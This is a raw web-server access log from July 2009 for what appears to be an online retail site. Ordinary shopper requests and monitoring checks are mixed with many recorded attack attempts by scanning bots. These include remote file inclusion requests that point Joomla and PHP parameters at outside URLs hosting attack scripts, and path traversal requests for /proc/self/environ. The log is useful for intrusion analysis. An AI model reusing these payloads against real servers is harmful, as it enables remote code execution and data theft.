76.89.144.147 - - [13/Jul/2009:04:47:36 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L1138DC4E1CF4D000642104L+WSEQ(S0060):1+OUITEM(A0200):6300004 HTTP/1.1" 200 27010 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1138DC401BF470008D6104L+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
76.89.144.147 - - [13/Jul/2009:04:47:37 -0400] "GET /images/items/6300004_FULL.JPG HTTP/1.1" 200 9353 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L1138DC4E1CF4D000642104L+WSEQ(S0060):1+OUITEM(A0200):6300004" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
76.89.144.147 - - [13/Jul/2009:04:47:41 -0400] "GET /images/pf-b.gif HTTP/1.1" 200 813 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1138DC401BF470008D6104L+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
79.174.68.88 - - [13/Jul/2009:04:47:44 -0400] "GET /logs/access_log.Q109053100//newspublish/include.php?path%5Bdocroot%5D=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
76.89.144.147 - - [13/Jul/2009:04:48:02 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1138DC4D1F245000988104L+M37+ENG HTTP/1.1" 200 59900 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1138DC401BF470008D6104L+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
76.89.144.147 - - [13/Jul/2009:04:48:04 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1138DC4D1F245000988104L+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
76.89.144.147 - - [13/Jul/2009:04:48:04 -0400] "GET /images/items/00320104_THUMB.JPG HTTP/1.1" 200 3198 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1138DC4D1F245000988104L+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
76.89.144.147 - - [13/Jul/2009:04:48:04 -0400] "GET /images/items/00320125_THUMB.JPG HTTP/1.1" 200 3160 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1138DC4D1F245000988104L+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
76.89.144.147 - - [13/Jul/2009:04:48:05 -0400] "GET /images/pf-b.gif HTTP/1.1" 200 813 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1138DC4D1F245000988104L+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
141.223.5.12 - - [13/Jul/2009:04:48:07 -0400] "GET /logs/access_log.Q109061100/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://www.hair.gr/v8id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
141.223.5.12 - - [13/Jul/2009:04:48:07 -0400] "GET /index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://www.hair.gr/v8id.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
141.223.5.12 - - [13/Jul/2009:04:48:08 -0400] "GET /logs/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://www.hair.gr/v8id.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
141.223.5.12 - - [13/Jul/2009:04:48:12 -0400] "GET /logs/access_log.Q109061100/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://telecompeers.com/cms/media/ramaid.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
141.223.5.12 - - [13/Jul/2009:04:48:12 -0400] "GET /index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://telecompeers.com/cms/media/ramaid.txt???? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
141.223.5.12 - - [13/Jul/2009:04:48:13 -0400] "GET /logs/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://telecompeers.com/cms/media/ramaid.txt???? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
124.0.145.1 - - [13/Jul/2009:04:48:20 -0400] "GET /?submit=submit&form_include_template=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
124.0.145.1 - - [13/Jul/2009:04:48:20 -0400] "GET /logs/access_log.Q109060600%20%20/?submit=submit&form_include_template=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
124.0.145.1 - - [13/Jul/2009:04:48:20 -0400] "GET /logs/access_log.Q109061300%20%20/?submit=submit&form_include_template=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
124.0.145.1 - - [13/Jul/2009:04:48:20 -0400] "GET /logs/?submit=submit&form_include_template=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 200 9324 "-" "Mozilla/5.0"
222.236.47.188 - - [13/Jul/2009:04:48:28 -0400] "GET /?submit=submit&form_include_template=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
222.236.47.188 - - [13/Jul/2009:04:48:28 -0400] "GET /logs/access_log.Q109060600%20%20/?submit=submit&form_include_template=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
222.236.47.188 - - [13/Jul/2009:04:48:28 -0400] "GET /logs/?submit=submit&form_include_template=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 200 9324 "-" "Mozilla/5.0"
76.89.144.147 - - [13/Jul/2009:04:48:30 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1138DC4C1FE46000B72104L+M37+ENG HTTP/1.1" 200 51371 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1138DC4D1F245000988104L+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
124.0.139.129 - - [13/Jul/2009:04:48:39 -0400] "GET /?submit=submit&form_include_template=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
124.0.139.129 - - [13/Jul/2009:04:48:39 -0400] "GET /logs/access_log.Q109061300%20%20/?submit=submit&form_include_template=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
124.0.139.129 - - [13/Jul/2009:04:48:39 -0400] "GET /logs/?submit=submit&form_include_template=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 200 9324 "-" "Mozilla/5.0"
124.0.139.129 - - [13/Jul/2009:04:48:39 -0400] "GET /logs/access_log.Q109060600%20%20/?submit=submit&form_include_template=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
222.236.47.188 - - [13/Jul/2009:04:48:40 -0400] "GET /logs/access_log.Q109061300%20%20/?submit=submit&form_include_template=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
65.254.32.2 - - [13/Jul/2009:04:48:45 -0400] "GET /logs/access_log.Q109061300/?submit=submit&form_include_template=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
65.254.32.2 - - [13/Jul/2009:04:48:51 -0400] "GET /logs/access_log.Q109060600/?submit=submit&form_include_template=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:49:05 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://jst.or.th/index1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:49:06 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://jst.or.th/index1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:49:06 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://jst.or.th/index1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:49:15 -0400] "GET /logs/access_log.Q109053100//newspublish/include.php?path%5Bdocroot%5D=http://jst.or.th/index1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
124.0.139.129 - - [13/Jul/2009:04:49:24 -0400] "GET /logs/access_log.Q109061300/?submit=submit&form_include_template=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
124.0.139.129 - - [13/Jul/2009:04:49:24 -0400] "GET /logs/access_log.Q109060600/?submit=submit&form_include_template=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
210.205.57.2 - - [13/Jul/2009:04:49:30 -0400] "GET /?submit=submit&form_include_template=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
210.205.57.2 - - [13/Jul/2009:04:49:30 -0400] "GET /logs/access_log.Q109060600%20%20/?submit=submit&form_include_template=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
210.205.57.2 - - [13/Jul/2009:04:49:30 -0400] "GET /logs/access_log.Q109061300%20%20/?submit=submit&form_include_template=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
210.205.57.2 - - [13/Jul/2009:04:49:30 -0400] "GET /logs/?submit=submit&form_include_template=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 200 9324 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:49:35 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://jst.or.th/index1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:49:35 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://jst.or.th/index1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:49:35 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://jst.or.th/index1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:49:43 -0400] "GET /logs/access_log.Q109053100%20%20//newspublish/include.php?path%5Bdocroot%5D=http://jst.or.th/index1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:50:03 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://jst.or.th/index1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:50:03 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://jst.or.th/index1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:50:03 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://jst.or.th/index1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:50:08 -0400] "GET /logs/access_log.Q109053100//newspublish/include.php?path%5Bdocroot%5D=http://jst.or.th/index1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
222.236.47.188 - - [13/Jul/2009:04:50:09 -0400] "GET /logs/access_log.Q109060600/?submit=submit&form_include_template=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
222.236.47.188 - - [13/Jul/2009:04:50:09 -0400] "GET /logs/access_log.Q109061300/?submit=submit&form_include_template=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
124.0.145.1 - - [13/Jul/2009:04:50:22 -0400] "GET /logs/access_log.Q109060600/?submit=submit&form_include_template=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
124.0.145.1 - - [13/Jul/2009:04:50:22 -0400] "GET /logs/access_log.Q109061300/?submit=submit&form_include_template=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
210.205.57.2 - - [13/Jul/2009:04:51:10 -0400] "GET /logs/access_log.Q109060600/?submit=submit&form_include_template=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
210.205.57.2 - - [13/Jul/2009:04:51:10 -0400] "GET /logs/access_log.Q109061300/?submit=submit&form_include_template=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:51:22 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://jst.or.th/index1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:51:22 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://jst.or.th/index1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:51:22 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://jst.or.th/index1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
222.236.44.96 - - [13/Jul/2009:04:51:31 -0400] "GET /logs/access_log.Q109053100//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
222.236.44.96 - - [13/Jul/2009:04:51:32 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
211.236.242.164 - - [13/Jul/2009:04:51:32 -0400] "GET /logs/access_log.Q109053100//newspublish/include.php?path%5Bdocroot%5D=http://jst.or.th/index1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
222.236.44.96 - - [13/Jul/2009:04:51:32 -0400] "GET /logs/access_log.Q109053100/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
222.236.44.96 - - [13/Jul/2009:04:51:32 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
222.236.44.96 - - [13/Jul/2009:04:51:32 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
222.236.44.96 - - [13/Jul/2009:04:51:32 -0400] "GET /logs/access_log.Q109053100//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 235 "-" "XXXXXX"
222.236.44.96 - - [13/Jul/2009:04:51:33 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
222.236.44.96 - - [13/Jul/2009:04:51:33 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 208 "-" "XXXXXX"
222.236.44.96 - - [13/Jul/2009:04:51:33 -0400] "GET /logs/access_log.Q109053100//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "XXXXXX"
222.236.44.96 - - [13/Jul/2009:04:51:33 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 213 "-" "XXXXXX"
222.236.44.96 - - [13/Jul/2009:04:51:33 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "XXXXXX"
222.236.44.96 - - [13/Jul/2009:04:51:34 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "XXXXXX"
80.177.76.74 - - [13/Jul/2009:04:51:46 -0400] "GET /images/ACE_BoneGraft_04.pdf HTTP/1.1" 200 9952673 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
80.177.76.74 - - [13/Jul/2009:04:52:01 -0400] "GET /images/ACE_BoneGraft_04.pdf HTTP/1.1" 206 9877483 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
209.59.12.99 - - [13/Jul/2009:04:52:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.177.76.74 - - [13/Jul/2009:04:52:13 -0400] "GET /images/ACE_BoneGraft_04.pdf HTTP/1.1" 206 9842565 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
141.223.5.12 - - [13/Jul/2009:04:52:21 -0400] "GET /logs/access_log.Q109060100/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://www.hair.gr/v8id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
141.223.5.12 - - [13/Jul/2009:04:52:22 -0400] "GET /logs/access_log.Q109060100/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://telecompeers.com/cms/media/ramaid.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
211.236.242.164 - - [13/Jul/2009:04:52:31 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://jst.or.th/index1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:52:31 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://jst.or.th/index1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:52:32 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://jst.or.th/index1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
80.177.76.74 - - [13/Jul/2009:04:52:23 -0400] "GET /images/ACE_BoneGraft_04.pdf HTTP/1.1" 206 8875978 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
80.177.76.74 - - [13/Jul/2009:04:52:43 -0400] "GET /images/ACE_BoneGraft_04.pdf HTTP/1.1" 206 7574245 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.174.68.88 - - [13/Jul/2009:04:53:22 -0400] "GET //atom.php5?page=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:53:22 -0400] "GET /logs//atom.php5?page=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:53:22 -0400] "GET /logs/access_log.Q109052300//atom.php5?page=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:53:26 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://jst.or.th/index1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:53:26 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://jst.or.th/index1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:53:26 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://jst.or.th/index1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:53:26 -0400] "GET //atom.php5?page=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:53:26 -0400] "GET /logs//atom.php5?page=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:53:26 -0400] "GET /logs/access_log.Q109052300%20%20//atom.php5?page=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
80.177.76.74 - - [13/Jul/2009:04:53:07 -0400] "GET /images/ACE_BoneGraft_04.pdf HTTP/1.1" 206 6787813 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
218.249.36.194 - - [13/Jul/2009:04:53:32 -0400] "GET /logs/access_log.Q109053100//newspublish/include.php?path%5Bdocroot%5D=http://jst.or.th/index1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:53:36 -0400] "GET /logs//atom.php5?page=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:53:36 -0400] "GET //atom.php5?page=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:53:39 -0400] "GET /logs/access_log.Q109052300//atom.php5?page=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.236.44.96 - - [13/Jul/2009:04:53:51 -0400] "GET /logs/access_log.Q109070800//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
222.236.44.96 - - [13/Jul/2009:04:53:51 -0400] "GET /logs/access_log.Q109070800/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
222.236.44.96 - - [13/Jul/2009:04:53:52 -0400] "GET /logs/access_log.Q109070800//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 235 "-" "XXXXXX"
222.236.44.96 - - [13/Jul/2009:04:53:53 -0400] "GET /logs/access_log.Q109070800//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "XXXXXX"
80.177.76.74 - - [13/Jul/2009:04:53:31 -0400] "GET /images/ACE_BoneGraft_04.pdf HTTP/1.1" 206 6151824 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
211.236.242.164 - - [13/Jul/2009:04:53:59 -0400] "GET /logs/access_log.Q109053100%20%20//newspublish/include.php?path%5Bdocroot%5D=http://jst.or.th/index1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.105.207.244 - - [13/Jul/2009:04:54:22 -0400] "GET //atom.php5?page=http://knbang.co.kr/security/trans/images/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.105.207.244 - - [13/Jul/2009:04:54:24 -0400] "GET /logs//atom.php5?page=http://knbang.co.kr/security/trans/images/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.105.207.244 - - [13/Jul/2009:04:54:33 -0400] "GET /logs/access_log.Q109052300//atom.php5?page=http://knbang.co.kr/security/trans/images/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.105.207.244 - - [13/Jul/2009:04:54:46 -0400] "GET //atom.php5?page=http://knbang.co.kr/security/trans/images/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.105.207.244 - - [13/Jul/2009:04:54:50 -0400] "GET /logs//atom.php5?page=http://knbang.co.kr/security/trans/images/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.105.207.244 - - [13/Jul/2009:04:54:51 -0400] "GET /logs/access_log.Q109052300//atom.php5?page=http://knbang.co.kr/security/trans/images/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
80.177.76.74 - - [13/Jul/2009:04:53:56 -0400] "GET /images/ACE_BoneGraft_04.pdf HTTP/1.1" 200 9952673 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
209.59.12.99 - - [13/Jul/2009:04:57:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [13/Jul/2009:05:03:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
